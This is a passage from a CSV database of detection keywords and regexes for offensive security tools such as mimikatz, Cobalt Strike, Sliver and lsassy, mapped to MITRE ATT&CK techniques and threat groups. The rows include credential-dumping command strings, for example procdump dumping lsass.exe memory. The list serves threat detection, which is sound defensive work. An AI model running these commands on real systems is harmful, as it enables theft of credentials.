T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Probable-Wordlists*",".{0,1000}Probable\-Wordlists.{0,1000}","offensive_tool_keyword","Probable-Wordlists","real password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tools","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*procdump* lsass.exe *.dmp*",".{0,1000}procdump.{0,1000}\slsass\.exe\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","269","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*procdump.exe -accepteula -ma lsass.exe*",".{0,1000}procdump\.exe\s\-accepteula\s\-ma\slsass\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*procdump.exe*lsass*",".{0,1000}procdump\.exe.{0,1000}lsass.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1003.001","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*procdump/dump_windows.go*",".{0,1000}procdump\/dump_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*procdump_dump*",".{0,1000}procdump_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*procdump_embedded*",".{0,1000}procdump_embedded.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*procdump_path=*",".{0,1000}procdump_path\=.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*ProcDumpHandler.py -r *",".{0,1000}ProcDumpHandler\.py\s\-r\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*process must run as NT AUTHORITY\\SYSTEM to dump lsass memory*",".{0,1000}process\smust\srun\sas\sNT\sAUTHORITY\\\\SYSTEM\sto\sdump\slsass\smemory.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*process::exports*",".{0,1000}process\:\:exports.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::imports*",".{0,1000}process\:\:imports.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::list*",".{0,1000}process\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::resume*",".{0,1000}process\:\:resume.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::run*",".{0,1000}process\:\:run.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::runp*",".{0,1000}process\:\:runp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::start*",".{0,1000}process\:\:start.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::stop*",".{0,1000}process\:\:stop.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process::suspend*",".{0,1000}process\:\:suspend.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*process_herpaderping*",".{0,1000}process_herpaderping.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*process_imports.cna*",".{0,1000}process_imports\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","81","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_imports.x64*",".{0,1000}process_imports\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","81","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_imports_api *.exe*",".{0,1000}process_imports_api\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","0","N/A","10","10","81","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*process_inject_allocator*",".{0,1000}process_inject_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_bof_allocator*",".{0,1000}process_inject_bof_allocator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_bof_reuse_memory*",".{0,1000}process_inject_bof_reuse_memory.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_execute*",".{0,1000}process_inject_execute.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_min_alloc*",".{0,1000}process_inject_min_alloc.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_startrwx*",".{0,1000}process_inject_startrwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*Process_Inject_Struct*",".{0,1000}Process_Inject_Struct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*process_inject_transform_x*",".{0,1000}process_inject_transform_x.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*process_inject_userwx*",".{0,1000}process_inject_userwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 